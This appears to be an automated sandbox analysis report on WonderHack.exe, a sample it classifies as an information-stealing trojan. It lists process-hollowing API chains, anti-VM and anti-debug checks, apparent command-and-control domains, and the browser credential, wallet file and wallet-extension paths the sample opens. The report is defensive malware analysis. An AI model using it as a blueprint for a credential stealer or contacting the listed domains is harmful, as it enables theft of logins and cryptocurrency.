                    Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: WonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: WonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                    Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49760 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49765 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49771 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49777 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49784 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49793 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49800 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49806 version: TLS 1.2
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CAC0400_2_00CAC040
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00C910000_2_00C91000
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CA61940_2_00CA6194
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CB12500_2_00CB1250
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CBEB720_2_00CBEB72
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CAAC410_2_00CAAC41
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CBCD970_2_00CBCD97
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: String function: 00CA66A0 appears 50 times
                    Source: WonderHack.exe, 00000000.00000000.1696868394.0000000000D21000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
                    Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
                    Source: WonderHack.exe, 00000002.00000002.2585059014.0000000000D21000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
                    Source: WonderHack.exe, 00000002.00000003.1704267961.0000000000BEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
                    Source: WonderHack.exeBinary or memory string: OriginalFilenameRpcPing.exej% vs WonderHack.exe
                    Source: WonderHack.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: WonderHack.exeStatic PE information: Section: .bss ZLIB complexity 1.000336057282794
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@11/3
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
                    Source: WonderHack.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\WonderHack.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: WonderHack.exe, 00000002.00000003.2453297401.00000000032FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: WonderHack.exeVirustotal: Detection: 38%
                    Source: WonderHack.exeReversingLabs: Detection: 28%
                    Source: C:\Users\user\Desktop\WonderHack.exeFile read: C:\Users\user\Desktop\WonderHack.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\WonderHack.exe "C:\Users\user\Desktop\WonderHack.exe"
                    Source: C:\Users\user\Desktop\WonderHack.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\WonderHack.exeProcess created: C:\Users\user\Desktop\WonderHack.exe "C:\Users\user\Desktop\WonderHack.exe"
                    Source: C:\Users\user\Desktop\WonderHack.exeProcess created: C:\Users\user\Desktop\WonderHack.exe "C:\Users\user\Desktop\WonderHack.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: WonderHack.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                    Source: WonderHack.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: WonderHack.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: WonderHack.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: WonderHack.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: WonderHack.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CA67C3 push ecx; ret 0_2_00CA67D6
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F5ED3C push eax; retf 2_3_00F5ED3D
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F5FA24 pushad ; retf 2_3_00F5FA25
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F147F8 pushfd ; iretd 2_3_00F147FD
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F147F8 pushfd ; iretd 2_3_00F147FD
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F1403C push esp; retf 2_3_00F14041
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F1403C push esp; retf 2_3_00F14041
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F147F8 pushfd ; iretd 2_3_00F147FD
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F147F8 pushfd ; iretd 2_3_00F147FD
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F1403C push esp; retf 2_3_00F14041
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F1403C push esp; retf 2_3_00F14041
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F5ED3C push eax; retf 2_3_00F5ED3D
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 2_3_00F5FA24 pushad ; retf 2_3_00F5FA25
                    Source: C:\Users\user\Desktop\WonderHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\WonderHack.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-22240
                    Source: C:\Users\user\Desktop\WonderHack.exe TID: 1076Thread sleep time: -270000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exe TID: 3704Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CB9126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CB9126
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430352231.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532232865.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527263074.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\WonderHack.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CAF2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CAF2B0
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CCF19E mov edi, dword ptr fs:[00000030h]0_2_00CCF19E
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00C916C0 mov edi, dword ptr fs:[00000030h]0_2_00C916C0
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CB4ABC GetProcessHeap,0_2_00CB4ABC
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CA616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CA616C
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CAF2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CAF2B0
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CA651C SetUnhandledExceptionFilter,0_2_00CA651C
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CA6528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CA6528

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CCF19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00CCF19E
                    Source: C:\Users\user\Desktop\WonderHack.exeMemory written: C:\Users\user\Desktop\WonderHack.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: steppriflej.xyz
                    Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sendypaster.xyz
                    Source: WonderHack.exe, 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bellflamre.click
                    Source: C:\Users\user\Desktop\WonderHack.exeProcess created: C:\Users\user\Desktop\WonderHack.exe "C:\Users\user\Desktop\WonderHack.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00CB83DF
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: EnumSystemLocalesW,0_2_00CB43A7
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00CB86CB
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: EnumSystemLocalesW,0_2_00CB8630
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: GetLocaleInfoW,0_2_00CB897D
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: EnumSystemLocalesW,0_2_00CB891E
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: GetLocaleInfoW,0_2_00CB8A9D
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: EnumSystemLocalesW,0_2_00CB8A52
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00CB8B44
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: GetLocaleInfoW,0_2_00CB8C4A
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: GetLocaleInfoW,0_2_00CB3EAC
                    Source: C:\Users\user\Desktop\WonderHack.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeCode function: 0_2_00CA7110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CA7110
                    Source: C:\Users\user\Desktop\WonderHack.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: WonderHack.exe, 00000002.00000003.2532156311.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585755451.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545384166.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532963840.00000000032EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\WonderHack.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: Process Memory Space: WonderHack.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: 2.2.WonderHack.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.WonderHack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
                    Source: WonderHack.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                    Source: WonderHack.exeString found in binary or memory: Wallets/JAXX New Version
                    Source: WonderHack.exeString found in binary or memory: window-state.json
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: WonderHack.exeString found in binary or memory: %appdata%\Ethereum
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
